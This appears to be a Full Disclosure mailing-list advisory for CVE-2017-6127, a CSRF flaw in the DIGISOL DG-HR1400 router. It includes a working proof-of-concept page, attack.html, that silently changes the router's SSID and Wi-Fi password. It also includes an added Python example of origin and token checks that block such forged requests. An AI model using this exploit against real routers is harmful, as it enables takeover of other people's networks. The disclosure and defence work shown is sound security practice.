Message-ID: <CACP8YJmyH-U1OfngR2oiKx9q5as1i8Zo3MZjhLPVrjPQtbjxKA@mail.gmail.com>
Date: Thu, 23 Feb 2017 15:20:39 +0530
From: Indrajith AN <indu.an444@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Multiple cross-site request forgery (CSRF) vulnerabilities in the DIGISOL (DG-HR 1400) Wireless Router

Title:
====
DIGISOL DG-HR1400 Wireless router – Cross-Site Request Forgery (CSRF) vulnerability

Credit:
======
Name: Indrajith.A.N
Website: https://www.indrajithan.com
Company: PwC-SDC

Reference:
=========
CVE Details: CVE-2017-6127

Date:
====
23-02-2017

Vendor:
======
DIGISOL router is a product of Smartlink Network Systems Ltd., one of India's leading networking companies. It was established in the year 1993 to prop the Indian market in the field of Network Infrastructure.

Product:
=======
DIGISOL DG-HR1400 is a wireless router.
Product link: http://wifi.digisol.com/datasheets/DG-HR1400.pdf

Abstract:
=======
Cross-Site Request Forgery (CSRF) vulnerability in the DIGISOL DG-HR1400 wireless router enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.

Affected Version:
=============
<=1.00.02

Exploitation-Technique:
===================
Remote

Severity Rating:
===================
7.9

Details:
=======
An attacker who lures a DG-HR1400 authenticated user to browse a malicious website can exploit cross-site request forgery (CSRF) to submit commands to the wireless router and gain control of the product. The attacker could submit a variety of commands including but not limited to changing the SSID name, password, security type etc.

Proof Of Concept:
================
1) User logs in to the DG-HR1400 wireless router
2) User visits the attacker's malicious web page (attack.html)
3) attack.html exploits the CSRF vulnerability and changes the SSID name and password

Exploit code (attack.html):

<html>
Digisol Router CSRF Exploit - Indrajith A.N
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.2.1/form2WlanBasicSetup.cgi" method="POST">
  <input type="hidden" name="mode" value="0" />
  <input type="hidden" name="apssid" value="hacked" />
  <input type="hidden" name="startScanUplinkAp" value="0" />
  <input type="hidden" name="domain" value="1" />
  <input type="hidden" name="hiddenSSID" value="on" />
  <input type="hidden" name="ssid" value="hacked" />
  <input type="hidden" name="band" value="10" />
  <input type="hidden" name="chan" value="6" />
  <input type="hidden" name="chanwid" value="1" />
  <input type="hidden" name="txRate" value="0" />
  <input type="hidden" name="method_cur" value="6" />
  <input type="hidden" name="method" value="6" />
  <input type="hidden" name="authType" value="2" />
  <input type="hidden" name="length" value="1" />
  <input type="hidden" name="format" value="2" />
  <input type="hidden" name="defaultTxKeyId" value="1" />
  <input type="hidden" name="key1" value="0000000000" />
  <input type="hidden" name="pskFormat" value="0" />
  <input type="hidden" name="pskValue" value="csrf1234" />
  <input type="hidden" name="checkWPS2" value="1" />
  <input type="hidden" name="save" value="Apply" />
  <input type="hidden" name="basicrates" value="15" />
  <input type="hidden" name="operrates" value="4095" />
  <input type="hidden" name="submit.htm?wlan_basic.htm" value="Send" />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>

Disclosure Timeline:
======================================
Vendor Notification: December 18, 2016

--
Indrajith

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
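
The server-side check whose absence the advisory describes, as an added example (not part of the original advisory and not DIGISOL firmware code): a settings handler that accepts a change only when the request comes from the router's own origin and carries a per-session token. The key, session ids, "csrf_token" field name and attacker.example origin are hypothetical; the sample requests are constructed.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumptions: 192.168.2.1 is the LAN address from the PoC; the key, the
# session ids and the "csrf_token" field name are hypothetical.
ALLOWED_ORIGINS = {"http://192.168.2.1"}
SERVER_KEY = secrets.token_bytes(32)  # regenerated on every boot


def issue_token(session_id):
    """Token the router embeds as a hidden field in forms it serves itself."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def request_origin(headers):
    """Origin header if present, otherwise scheme://host[:port] of the Referer."""
    origin = headers.get("Origin")
    if origin:
        return origin
    ref = urlsplit(headers.get("Referer", ""))
    return f"{ref.scheme}://{ref.netloc}" if ref.scheme and ref.netloc else None


def check_state_change(method, headers, form, session_id):
    """Return (allowed, reason) for a request to a settings CGI."""
    if method != "POST":
        return False, "settings changes must use POST"
    if request_origin(headers) not in ALLOWED_ORIGINS:
        return False, "cross-origin or missing Origin/Referer"
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, issue_token(session_id).encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed sample requests. FORGED is what a browser sends when the
# advisory's attack.html form is submitted: the admin's session rides along,
# but the Origin is the attacker's page and no token is present.
SESSION = "admin-session-1"
FORGED = ("POST", {"Origin": "http://attacker.example"},
          {"ssid": "hacked", "pskValue": "csrf1234", "save": "Apply"})
GENUINE = ("POST", {"Origin": "http://192.168.2.1"},
           {"ssid": "home", "save": "Apply", "csrf_token": issue_token(SESSION)})

if __name__ == "__main__":
    for name, (method, headers, form) in (("forged", FORGED), ("genuine", GENUINE)):
        print(name, check_state_change(method, headers, form, SESSION))
```

Rejecting requests that carry neither Origin nor Referer is a strict policy choice that suits an admin interface reached only from a browser on the LAN.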